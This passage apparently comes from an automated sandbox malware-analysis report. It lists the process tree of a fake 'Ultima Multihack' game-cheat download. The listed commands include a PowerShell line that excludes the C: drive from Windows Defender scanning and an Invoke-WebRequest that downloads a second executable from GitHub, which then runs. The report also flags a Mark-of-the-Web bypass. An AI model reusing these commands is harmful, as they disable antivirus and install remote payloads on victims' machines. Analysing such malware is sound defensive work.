5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 4140 attrib.exe 5256 attrib.exe
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/doodoofart3443/ZM-ULTI/raw/refs/heads/main/Ultima%20Multihack%20V3.55.rar1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5820 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeb6efdcf8,0x7ffeb6efdd04,0x7ffeb6efdd102⤵PID:224
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1416,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2012 /prefetch:112⤵PID:2276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1984,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=1980 /prefetch:22⤵PID:1656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2356,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2368 /prefetch:132⤵PID:5644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3228 /prefetch:12⤵PID:1196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3284 /prefetch:12⤵PID:5300
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4156,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3764 /prefetch:92⤵PID:4840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5328,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5340 /prefetch:142⤵
- NTFS ADS
PID:5000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5384,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5396 /prefetch:142⤵PID:1948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5772,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5860 /prefetch:12⤵PID:3792
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5796,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5624 /prefetch:12⤵PID:3464
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=212,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3300 /prefetch:142⤵PID:2772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3452,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3444 /prefetch:142⤵PID:5652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3288,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6008 /prefetch:142⤵PID:5840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4152,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4784 /prefetch:12⤵PID:3164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=3232,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3312 /prefetch:12⤵PID:3124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5432,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3332 /prefetch:12⤵PID:4496
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3404,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6028 /prefetch:12⤵PID:920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4200,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4220 /prefetch:142⤵PID:3396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5228,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5448 /prefetch:122⤵PID:3772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=6212,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6220 /prefetch:12⤵PID:3476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=5460,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6180 /prefetch:12⤵PID:4432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=6420,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6436 /prefetch:12⤵PID:2764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=6604,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6644 /prefetch:12⤵PID:4148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=3380,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5736 /prefetch:12⤵PID:5448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=5804,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3368 /prefetch:12⤵PID:5400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=6520,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6484 /prefetch:12⤵PID:1936
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=4276,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4252 /prefetch:12⤵PID:3252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3372,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6136 /prefetch:142⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=4784,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5872 /prefetch:12⤵PID:6100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=7008,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7028 /prefetch:12⤵PID:952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=6880,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6932 /prefetch:12⤵PID:5276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=7268,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7256 /prefetch:12⤵PID:720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=7324,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7440 /prefetch:12⤵PID:3700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=7608,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6936 /prefetch:12⤵PID:4340
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=7724,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7760 /prefetch:12⤵PID:1740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=7904,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7924 /prefetch:12⤵PID:3972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=8048,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8060 /prefetch:12⤵PID:388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=8284,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8272 /prefetch:12⤵PID:3424
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=8224,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8316 /prefetch:12⤵PID:556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=7720,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8056 /prefetch:12⤵PID:4300
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=8352,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6140 /prefetch:12⤵PID:5248
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --field-trial-handle=8528,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8344 /prefetch:12⤵PID:2444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=8016,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6052 /prefetch:12⤵PID:2396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=7992,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7588 /prefetch:12⤵PID:3444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=8492,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8092 /prefetch:142⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3792
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=7956,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8200 /prefetch:142⤵PID:4352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=7692,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8356 /prefetch:142⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
PID:1264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=8012,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8732 /prefetch:102⤵
- Suspicious behavior: EnumeratesProcesses
PID:1876
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4796,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4544 /prefetch:142⤵PID:2636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=8860,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8832 /prefetch:12⤵PID:6000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --field-trial-handle=8776,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8920 /prefetch:12⤵PID:5272
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:4692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4356
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:748
-
F:\Ultima Multihack V3.5\Ultima Multihack V3.55.exe"F:\Ultima Multihack V3.5\Ultima Multihack V3.55.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1164 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7DF0.tmp\7DF1.tmp\7DF2.bat "F:\Ultima Multihack V3.5\Ultima Multihack V3.55.exe""2⤵PID:5340
-
C:\Windows\system32\net.exenet session3⤵PID:2340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:3068
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2196
-
-
C:\Windows\system32\where.exewhere powershell3⤵PID:5388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/doodoofart3443/test/raw/refs/heads/main/file5.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\file5.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1168
-
-
C:\Users\Admin\AppData\Local\Temp\file5.exe"C:\Users\Admin\AppData\Local\Temp\file5.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:1264 -
C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE"C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE"4⤵
